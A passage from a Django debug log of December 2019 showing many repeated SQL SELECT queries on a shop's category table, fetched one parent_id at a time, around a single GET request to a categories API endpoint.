"shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-18 09:26:27,153 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-18 09:26:27,158 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-18 09:26:27,162 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-18 09:26:27,165 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-18 09:26:27,168 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-18 09:26:27,171 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-18 09:26:27,176 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-18 09:26:27,179 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-18 09:26:27,182 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-18 09:26:27,185 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-18 09:26:27,189 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-18 09:26:27,193 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-18 09:26:27,197 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-18 09:26:27,200 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-18 09:26:27,203 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-18 09:26:27,206 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-18 09:26:27,210 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-18 09:26:27,214 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-18 09:26:27,217 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-18 09:26:27,220 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-18 09:26:27,225 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-18 09:26:27,228 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [18/Dec/2019 09:26:27] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-18 09:26:30,432 utils 4252 140031747061504 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-18 09:26:30,439 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-18 09:26:30,444 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-18 09:26:30,449 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-18 09:26:30,455 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-18 09:26:30,459 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-18 09:26:30,463 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-18 09:26:30,467 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-18 09:26:30,471 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-18 09:26:30,475 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-18 09:26:30,478 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-18 09:26:30,480 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-18 09:26:30,482 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-18 09:26:30,485 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-18 09:26:30,488 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-18 09:26:30,490 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-18 09:26:30,493 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-18 09:26:30,495 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-18 09:26:30,497 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-18 09:26:30,501 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-18 09:26:30,503 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-18 09:26:30,505 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-18 09:26:30,507 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-18 09:26:30,510 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-18 09:26:30,512 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-18 09:26:30,516 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-18 09:26:30,518 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-18 09:26:30,520 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-18 09:26:30,523 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-18 09:26:30,525 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-18 09:26:30,528 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-18 09:26:30,530 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-18 09:26:30,533 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-18 09:26:30,535 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-18 09:26:30,537 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-18 09:26:30,541 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-18 09:26:30,544 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-18 09:26:30,546 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-18 09:26:30,548 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-18 09:26:30,550 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-18 09:26:30,553 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-18 09:26:30,556 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-18 09:26:30,559 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-18 09:26:30,561 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-18 09:26:30,565 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM 